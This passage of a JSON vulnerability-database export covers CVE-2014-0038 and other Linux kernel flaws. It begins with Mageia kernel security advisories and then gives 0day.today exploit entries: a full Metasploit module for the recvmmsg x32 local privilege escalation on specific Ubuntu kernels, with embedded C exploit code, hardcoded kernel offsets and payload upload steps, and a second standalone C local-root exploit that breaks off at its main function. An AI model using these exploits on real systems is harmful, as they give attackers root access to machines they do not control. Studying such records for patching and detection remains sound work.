6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4579", "CVE-2014-0038", "CVE-2014-1438", "CVE-2014-1446", "CVE-2014-1690"], "modified": "2014-02-11T22:38:44", "id": "MGASA-2014-0055", "href": "https://advisories.mageia.org/MGASA-2014-0055.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an update to the 3.10 longterm branch, currently 3.10.28 and fixes the following security issues: The ath9k_htc_set_bssid_mask function in drivers/net/wireless/ath/ath9k/htc_drv_main.c in the Linux kernel through 3.12 uses a BSSID masking approach to determine the set of MAC addresses on which a Wi-Fi device is listening, which allows remote attackers to discover the original MAC address after spoofing by sending a series of packets to MAC addresses with certain bit manipulations. (CVE-2013-4579) Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges (CVE-2014-0038) Faults during task-switch due to unhandled FPU-exceptions allow to kill processes at random on all affected kernels, resulting in local DOS in the end. One some architectures, privilege escalation under non-common circumstances is possible. (CVE-2014-1438) The hamradio yam_ioctl() code fails to initialise the cmd field of the struct yamdrv_ioctl_cfg leading to a 4-byte info leak. (CVE-2014-1446) Linux kernel built with the NetFilter Connection Tracking(NF_CONNTRACK) support for IRC protocol(NF_NAT_IRC), is vulnerable to an information leakage flaw. It could occur when communicating over direct client-to-client IRC connection(/dcc) via a NAT-ed network. Kernel attempts to mangle IRC TCP packet's content, wherein an uninitialised 'buffer' object is copied to a socket buffer and sent over to the other end of a connection. (CVE-2014-1690) The -rt patch has been updated to -rt25 For other changes, see the referenced changelogs: \n", "cvss3": {}, "published": "2014-02-10T20:06:51", "type": "mageia", "title": "Updated kernel-rt packages fix multiple vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4579", "CVE-2014-0038", "CVE-2014-1438", "CVE-2014-1446", "CVE-2014-1690"], "modified": "2014-02-10T20:06:51", "id": "MGASA-2014-0044", "href": "https://advisories.mageia.org/MGASA-2014-0044.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an update to the 3.10 longterm branch, currently 3.10.28 and fixes the following security issues: The ath9k_htc_set_bssid_mask function in drivers/net/wireless/ath/ath9k/htc_drv_main.c in the Linux kernel through 3.12 uses a BSSID masking approach to determine the set of MAC addresses on which a Wi-Fi device is listening, which allows remote attackers to discover the original MAC address after spoofing by sending a series of packets to MAC addresses with certain bit manipulations. (CVE-2013-4579) Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges (CVE-2014-0038) Faults during task-switch due to unhandled FPU-exceptions allow to kill processes at random on all affected kernels, resulting in local DOS in the end. One some architectures, privilege escalation under non-common circumstances is possible. (CVE-2014-1438) The hamradio yam_ioctl() code fails to initialise the cmd field of the struct yamdrv_ioctl_cfg leading to a 4-byte info leak. (CVE-2014-1446) Linux kernel built with the NetFilter Connection Tracking(NF_CONNTRACK) support for IRC protocol(NF_NAT_IRC), is vulnerable to an information leakage flaw. It could occur when communicating over direct client-to-client IRC connection(/dcc) via a NAT-ed network. Kernel attempts to mangle IRC TCP packet's content, wherein an uninitialised 'buffer' object is copied to a socket buffer and sent over to the other end of a connection. (CVE-2014-1690) For other changes, see the referenced changelogs \n", "cvss3": {}, "published": "2014-02-12T22:53:19", "type": "mageia", "title": "Updated kernel-vserver packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4579", "CVE-2014-0038", "CVE-2014-1438", "CVE-2014-1446", "CVE-2014-1690"], "modified": "2014-02-12T22:53:19", "id": "MGASA-2014-0064", "href": "https://advisories.mageia.org/MGASA-2014-0064.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an update to the 3.10 longterm branch, currently 3.10.28 and fixes the following security issues: The ath9k_htc_set_bssid_mask function in drivers/net/wireless/ath/ath9k/htc_drv_main.c in the Linux kernel through 3.12 uses a BSSID masking approach to determine the set of MAC addresses on which a Wi-Fi device is listening, which allows remote attackers to discover the original MAC address after spoofing by sending a series of packets to MAC addresses with certain bit manipulations. (CVE-2013-4579) Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges (CVE-2014-0038) Faults during task-switch due to unhandled FPU-exceptions allow to kill processes at random on all affected kernels, resulting in local DOS in the end. One some architectures, privilege escalation under non-common circumstances is possible. (CVE-2014-1438) The hamradio yam_ioctl() code fails to initialise the cmd field of the struct yamdrv_ioctl_cfg leading to a 4-byte info leak. (CVE-2014-1446) Linux kernel built with the NetFilter Connection Tracking(NF_CONNTRACK) support for IRC protocol(NF_NAT_IRC), is vulnerable to an information leakage flaw. It could occur when communicating over direct client-to-client IRC connection(/dcc) via a NAT-ed network. Kernel attempts to mangle IRC TCP packet's content, wherein an uninitialised 'buffer' object is copied to a socket buffer and sent over to the other end of a connection. (CVE-2014-1690) For other changes, see the referenced changelogs: \n", "cvss3": {}, "published": "2014-02-10T20:09:03", "type": "mageia", "title": "Updated kernel-tmb packages fix multiple vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4579", "CVE-2014-0038", "CVE-2014-1438", "CVE-2014-1446", "CVE-2014-1690"], "modified": "2014-02-10T20:09:03", "id": "MGASA-2014-0045", "href": "https://advisories.mageia.org/MGASA-2014-0045.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an update to the 3.10 longterm branch, currently 3.10.28 and fixes the following security issues: The ath9k_htc_set_bssid_mask function in drivers/net/wireless/ath/ath9k/htc_drv_main.c in the Linux kernel through 3.12 uses a BSSID masking approach to determine the set of MAC addresses on which a Wi-Fi device is listening, which allows remote attackers to discover the original MAC address after spoofing by sending a series of packets to MAC addresses with certain bit manipulations. (CVE-2013-4579) Array index error in the kvm_vm_ioctl_create_vcpu function in virt/kvm/kvm_main.c in the KVM subsystem in the Linux kernel through 3.12.5 allows local users to gain privileges via a large id value (CVE-2013-4587) The apic_get_tmcct function in arch/x86/kvm/lapic.c in the KVM subsystem in the Linux kernel through 3.12.5 allows guest OS users to cause a denial of service (divide-by-zero error and host OS crash) via crafted modifications of the TMICT value. (CVE-2013-6367) The KVM subsystem in the Linux kernel through 3.12.5 allows local users to gain privileges or cause a denial of service (system crash) via a VAPIC synchronization operation involving a page-end address. (CVE-2013-6368) The recalculate_apic_map function in arch/x86/kvm/lapic.c in the KVM subsystem in the Linux kernel through 3.12.5 allows guest OS users to cause a denial of service (host OS crash) via a crafted ICR write operation in x2apic mode. (CVE-2013-6376) Multiple buffer underflows in the XFS implementation in the Linux kernel through 3.12.1 allow local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the CAP_SYS_ADMIN capability for a (1) XFS_IOC_ATTRLIST_BY_HANDLE or (2) XFS_IOC_ATTRLIST_BY_HANDLE_32 ioctl call with a crafted length value, related to the xfs_attrlist_by_handle function in fs/xfs/xfs_ioctl.c and the xfs_compat_attrlist_by_handle function in fs/xfs/xfs_ioctl32.c. (CVE-2013-6382) Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges (CVE-2014-0038) Faults during task-switch due to unhandled FPU-exceptions allow to kill processes at random on all affected kernels, resulting in local DOS in the end. One some architectures, privilege escalation under non-common circumstances is possible. (CVE-2014-1438) The hamradio yam_ioctl() code fails to initialise the cmd field of the struct yamdrv_ioctl_cfg leading to a 4-byte info leak. (CVE-2014-1446) Linux kernel built with the NetFilter Connection Tracking(NF_CONNTRACK) support for IRC protocol(NF_NAT_IRC), is vulnerable to an information leakage flaw. It could occur when communicating over direct client-to-client IRC connection(/dcc) via a NAT-ed network. Kernel attempts to mangle IRC TCP packet's content, wherein an uninitialised 'buffer' object is copied to a socket buffer and sent over to the other end of a connection. (CVE-2014-1690) For other changes, see the referenced changelogs: \n", "cvss3": {}, "published": "2014-02-10T20:03:47", "type": "mageia", "title": "Updated kernel-linus package fixes multiple vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4579", "CVE-2013-4587", "CVE-2013-6367", "CVE-2013-6368", "CVE-2013-6376", "CVE-2013-6382", "CVE-2014-0038", "CVE-2014-1438", "CVE-2014-1446", "CVE-2014-1690"], "modified": "2014-02-10T20:03:47", "id": "MGASA-2014-0043", "href": "https://advisories.mageia.org/MGASA-2014-0043.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-03T03:03:02", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2016-10-12T00:00:00", "type": "zdt", "title": "Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2016-10-12T00:00:00", "id": "1337DAY-ID-25496", "href": "https://0day.today/exploit/description/25496", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire \"msf/core\"\r\n \r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n \r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to exploit CVE-2014-0038, by sending a recvmmsg\r\n system call with a crafted timeout pointer parameter to gain root.\r\n This exploit has offsets for 3 Ubuntu 13 kernels built in:\r\n 3.8.0-19-generic (13.04 default)\r\n 3.11.0-12-generic (13.10 default)\r\n 3.11.0-15-generic (13.10)\r\n This exploit may take up to 13 minutes to run due to a decrementing (1/sec)\r\n pointer which starts at 0xff*3 (765 seconds)\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'h00die <[email\u00a0protected]>', # Module\r\n 'rebel' # Discovery\r\n ],\r\n 'DisclosureDate' => 'Feb 2 2014',\r\n 'Platform' => [ 'linux'],\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Auto', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'WfsDelay' => 780, 'PrependFork' => true, },\r\n 'References' =>\r\n [\r\n [ 'EDB', '31347'],\r\n [ 'EDB', '31346'],\r\n [ 'CVE', '2014-0038'],\r\n [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900']\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\r\n ], self.class)\r\n end\r\n \r\n def check\r\n def kernel_vuln?()\r\n os_id = cmd_exec('grep ^ID= /etc/os-release')\r\n if os_id == 'ID=ubuntu'\r\n kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))\r\n case kernel.release.to_s\r\n when '3.11.0'\r\n if kernel == Gem::Version.new('3.11.0-15-generic') || kernel == Gem::Version.new('3.11.0-12-generic')\r\n vprint_good(\"Kernel #{kernel} is exploitable\")\r\n return true\r\n else\r\n print_error(\"Kernel #{kernel} is NOT vulnerable or NOT exploitable\")\r\n return false\r\n end\r\n when '3.8.0'\r\n if kernel == Gem::Version.new('3.8.0-19-generic')\r\n vprint_good(\"Kernel #{kernel} is exploitable\")\r\n return true\r\n else\r\n print_error(\"Kernel #{kernel} is NOT vulnerable or NOT exploitable\")\r\n return false\r\n end\r\n else\r\n print_error(\"Non-vuln kernel #{kernel}\")\r\n return false\r\n end\r\n else\r\n print_error(\"Unknown OS: #{os_id}\")\r\n return false\r\n end\r\n end\r\n \r\n if kernel_vuln?()\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit\r\n \r\n if check != CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')\r\n end\r\n \r\n \r\n # direct copy of code from exploit-db. I removed a lot of the comments in the title area just to cut down on size\r\n \r\n recvmmsg = %q{\r\n /*\r\n *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\r\n recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)\r\n CVE-2014-0038 / x32 ABI with recvmmsg\r\n by rebel @ irc.smashthestack.org\r\n -----------------------------------\r\n */\r\n \r\n #define _GNU_SOURCE\r\n #include <netinet/ip.h>\r\n #include <stdio.h>\r\n #include <stdlib.h>\r\n #include <string.h>\r\n #include <sys/socket.h>\r\n #include <unistd.h>\r\n #include <sys/syscall.h>\r\n #include <sys/mman.h>\r\n #include <sys/types.h>\r\n #include <sys/stat.h>\r\n #include <fcntl.h>\r\n #include <sys/utsname.h>\r\n \r\n #define __X32_SYSCALL_BIT 0x40000000\r\n #undef __NR_recvmmsg\r\n #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\r\n #define VLEN 1\r\n #define BUFSIZE 200\r\n \r\n int port;\r\n \r\n struct offset {\r\n char *kernel_version;\r\n unsigned long dest; // net_sysctl_root + 96\r\n unsigned long original_value; // net_ctl_permissions\r\n unsigned long prepare_kernel_cred;\r\n unsigned long commit_creds;\r\n };\r\n \r\n struct offset offsets[] = {\r\n {\"3.11.0-15-generic\",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10\r\n {\"3.11.0-12-generic\",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10\r\n {\"3.8.0-19-generic\",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04\r\n {NULL,0,0,0,0}\r\n };\r\n \r\n void udp(int b) {\r\n int sockfd;\r\n struct sockaddr_in servaddr,cliaddr;\r\n int s = 0xff+1;\r\n \r\n if(fork() == 0) {\r\n while(s > 0) {\r\n fprintf(stderr,\"\\rbyte %d / 3.. ~%d secs left \\b\\b\\b\\b\",b+1,3*0xff - b*0xff - (0xff+1-s));\r\n sleep(1);\r\n s--;\r\n fprintf(stderr,\".\");\r\n }\r\n \r\n sockfd = socket(AF_INET,SOCK_DGRAM,0);\r\n bzero(&servaddr,sizeof(servaddr));\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);\r\n servaddr.sin_port=htons(port);\r\n sendto(sockfd,\"1\",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));\r\n exit(0);\r\n }\r\n \r\n }\r\n \r\n void trigger() {\r\n open(\"/proc/sys/net/core/somaxconn\",O_RDONLY);\r\n \r\n if(getuid() != 0) {\r\n fprintf(stderr,\"not root, ya blew it!\\n\");\r\n exit(-1);\r\n }\r\n \r\n fprintf(stderr,\"w00p w00p!\\n\");\r\n system(\"/bin/sh -i\");\r\n }\r\n \r\n typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\n typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n _commit_creds commit_creds;\r\n _prepare_kernel_cred prepare_kernel_cred;\r\n \r\n // thx bliss\r\n static int __attribute__((regparm(3)))\r\n getroot(void *head, void * table)\r\n {\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n }\r\n \r\n void __attribute__((regparm(3)))\r\n trampoline()\r\n {\r\n asm(\"mov $getroot, %rax; call *%rax;\");\r\n }\r\n \r\n int main(void)\r\n {\r\n int sockfd, retval, i;\r\n struct sockaddr_in sa;\r\n struct mmsghdr msgs[VLEN];\r\n struct iovec iovecs[VLEN];\r\n char buf[BUFSIZE];\r\n long mmapped;\r\n struct utsname u;\r\n struct offset *off = NULL;\r\n \r\n uname(&u);\r\n \r\n for(i=0;offsets[i].kernel_version != NULL;i++) {\r\n if(!strcmp(offsets[i].kernel_version,u.release)) {\r\n off = &offsets[i];\r\n break;\r\n }\r\n }\r\n \r\n if(!off) {\r\n fprintf(stderr,\"no offsets for this kernel version..\\n\");\r\n exit(-1);\r\n }\r\n \r\n mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));\r\n mmapped &= 0x000000ffffffffff;\r\n \r\n srand(time(NULL));\r\n port = (rand() % 30000)+1500;\r\n \r\n commit_creds = (_commit_creds)off->commit_creds;\r\n prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;\r\n \r\n mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n \r\n if(mmapped == -1) {\r\n perror(\"mmap()\");\r\n exit(-1);\r\n }\r\n \r\n memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);\r\n \r\n memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);\r\n \r\n if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {\r\n perror(\"mprotect()\");\r\n exit(-1);\r\n }\r\n \r\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sockfd == -1) {\r\n perror(\"socket()\");\r\n exit(-1);\r\n }\r\n \r\n sa.sin_family = AF_INET;\r\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n sa.sin_port = htons(port);\r\n \r\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\r\n perror(\"bind()\");\r\n exit(-1);\r\n }\r\n \r\n memset(msgs, 0, sizeof(msgs));\r\n \r\n iovecs[0].iov_base = &buf;\r\n iovecs[0].iov_len = BUFSIZE;\r\n msgs[0].msg_hdr.msg_iov = &iovecs[0];\r\n msgs[0].msg_hdr.msg_iovlen = 1;\r\n \r\n for(i=0;i < 3 ;i++) {\r\n udp(i);\r\n retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);\r\n if(!retval) {\r\n fprintf(stderr,\"\\nrecvmmsg() failed\\n\");\r\n }\r\n }\r\n \r\n close(sockfd);\r\n fprintf(stderr,\"\\n\");\r\n trigger();\r\n }\r\n }\r\n \r\n filename = rand_text_alphanumeric(8)\r\n executable_path = \"#{datastore['WritableDir']}/#{filename}\"\r\n payloadname = rand_text_alphanumeric(8)\r\n payload_path = \"#{datastore['WritableDir']}/#{payloadname}\"\r\n \r\n def has_prereqs?()\r\n gcc = cmd_exec('which gcc')\r\n if gcc.include?('gcc')\r\n vprint_good('gcc is installed')\r\n else\r\n print_error('gcc is not installed. Compiling will fail.')\r\n end\r\n return gcc.include?('gcc')\r\n end\r\n \r\n compile = false\r\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\r\n if has_prereqs?()\r\n compile = true\r\n vprint_status('Live compiling exploit on system')\r\n else\r\n vprint_status('Dropping pre-compiled exploit on system')\r\n end\r\n end\r\n if check != CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')\r\n end\r\n \r\n def upload_and_chmod(fname,fcontent)\r\n print_status \"Writing to #{fname} (#{fcontent.size} bytes)\"\r\n rm_f fname\r\n write_file(fname, fcontent)\r\n cmd_exec(\"chmod +x #{fname}\")\r\n register_file_for_cleanup(fname)\r\n end\r\n \r\n if compile\r\n recvmmsg.gsub!(/system\\(\"\\/bin\\/sh -i\"\\);/,\r\n \"system(\\\"#{payload_path}\\\");\")\r\n upload_and_chmod(\"#{executable_path}.c\", recvmmsg)\r\n vprint_status(\"Compiling #{executable_path}.c\")\r\n cmd_exec(\"gcc -o #{executable_path} #{executable_path}.c\") #compile\r\n register_file_for_cleanup(executable_path)\r\n else\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', 'recvmmsg')\r\n fd = ::File.open( path, \"rb\")\r\n recvmmsg = fd.read(fd.stat.size)\r\n fd.close\r\n upload_and_chmod(executable_path, recvmmsg)\r\n # overwrite with the hardcoded variable names in the compiled versions\r\n payload_filename = 'a0RwAacU'\r\n payload_path = \"/tmp/#{payload_filename}\"\r\n end\r\n \r\n upload_and_chmod(payload_path, generate_payload_exe)\r\n stime = Time.now\r\n vprint_status(\"Exploiting... May take 13min. Start time: #{stime}\")\r\n output = cmd_exec(executable_path)\r\n output.each_line { |line| vprint_status(line.chomp) }\r\n end\r\nend\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/25496", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-10T04:13:47", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2014-02-02T00:00:00", "type": "zdt", "title": "Linux kernel 3.4+ Arbitrary write with CONFIG_X86_X32", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-02T00:00:00", "id": "1337DAY-ID-21852", "href": "https://0day.today/exploit/description/21852", "sourceData": "/*\r\n * Local root exploit for CVE-2014-0038.\r\n *\r\n * https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c\r\n *\r\n * Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer\r\n * passed from userspace.\r\n *\r\n * Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg,\r\n * if the original byte at that address is known it can be overwritten\r\n * with known data.\r\n * If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00.\r\n *\r\n * Restrictions: The first long at the passed address (tv_sec) has to be positive\r\n * and the second long (tv_nsec) has to be smaller than 1000000000.\r\n *\r\n * Overview: Target the release function pointer of the ptmx_fops structure located in\r\n * non initialized (and thus writable) kernel memory. Zero out the three most\r\n * significant bytes and thus turn it into a pointer to an address mappable in\r\n * user space.\r\n * The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec\r\n * is valid).\r\n * Open /dev/ptmx, close it and enjoy.\r\n *\r\n * Not very beautiful but should be fairly reliable if symbols can be resolved.\r\n *\r\n * Tested on Ubuntu 13.10\r\n *\r\n * gcc timeoutpwn.c -o pwn && ./pwn\r\n *\r\n * Written by saelo\r\n */\r\n#define _GNU_SOURCE\r\n#include <netinet/ip.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <time.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <sys/syscall.h>\r\n#include <sys/wait.h>\r\n#include <sys/mman.h>\r\n \r\n#define __X32_SYSCALL_BIT 0x40000000\r\n#undef __NR_recvmmsg\r\n#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\r\n \r\n#define BUFSIZE 200\r\n#define PAYLOADSIZE 0x2000\r\n#define FOPS_RELEASE_OFFSET 13*8\r\n \r\n/*\r\n * Adapt these addresses for your need.\r\n * see /boot/System.map* or /proc/kallsyms\r\n * These are the offsets from ubuntu 3.11.0-12-generic.\r\n */\r\n#define PTMX_FOPS 0xffffffff81fb30c0LL\r\n#define TTY_RELEASE 0xffffffff8142fec0LL\r\n#define COMMIT_CREDS 0xffffffff8108ad40LL\r\n#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n \r\n/*\r\n * Match signature of int release(struct inode*, struct file*).\r\n *\r\n * See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz\r\n */\r\nint __attribute__((regparm(3)))\r\nkernel_payload(void* foo, void* bar)\r\n{\r\n _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;\r\n _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;\r\n \r\n *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; // restore pointer\r\n commit_creds(prepare_kernel_cred(0));\r\n \r\n return -1;\r\n}\r\n \r\n/*\r\n * Write a zero to the byte at then given address.\r\n * Only works if the current value is 0xff.\r\n */\r\nvoid zero_out(long addr)\r\n{\r\n int sockfd, retval, port, pid, i;\r\n struct sockaddr_in sa;\r\n char buf[BUFSIZE];\r\n struct mmsghdr msgs;\r\n struct iovec iovecs;\r\n \r\n srand(time(NULL));\r\n \r\n port = 1024 + (rand() % (0x10000 - 1024));\r\n \r\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sockfd == -1) {\r\n perror(\"socket()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n sa.sin_family = AF_INET;\r\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n sa.sin_port = htons(port);\r\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\r\n perror(\"bind()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n memset(&msgs, 0, sizeof(msgs));\r\n iovecs.iov_base = buf;\r\n iovecs.iov_len = BUFSIZE;\r\n msgs.msg_hdr.msg_iov = &iovecs;\r\n msgs.msg_hdr.msg_iovlen = 1;\r\n \r\n /*\r\n * start a seperate process to send a udp message after 255 seconds so the syscall returns,\r\n * but not after updating the timout struct and writing the remaining time into it.\r\n * 0xff - 255 seconds = 0x00\r\n */\r\n printf(\"clearing byte at 0x%lx\\n\", addr);\r\n pid = fork();\r\n if (pid == 0) {\r\n memset(buf, 0x41, BUFSIZE);\r\n \r\n if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {\r\n perror(\"socket()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n sa.sin_family = AF_INET;\r\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n sa.sin_port = htons(port);\r\n \r\n printf(\"waiting 255 seconds...\\n\");\r\n for (i = 0; i < 255; i++) {\r\n if (i % 10 == 0)\r\n printf(\"%is/255s\\n\", i);\r\n sleep(1);\r\n }\r\n \r\n printf(\"waking up parent...\\n\");\r\n sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));\r\n exit(EXIT_SUCCESS);\r\n } else if (pid > 0) {\r\n retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);\r\n if (retval == -1) {\r\n printf(\"address can't be written to, not a valid timespec struct\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n waitpid(pid, 0, 0);\r\n printf(\"byte zeroed out\\n\");\r\n } else {\r\n perror(\"fork()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nint main(int argc, char** argv)\r\n{\r\n 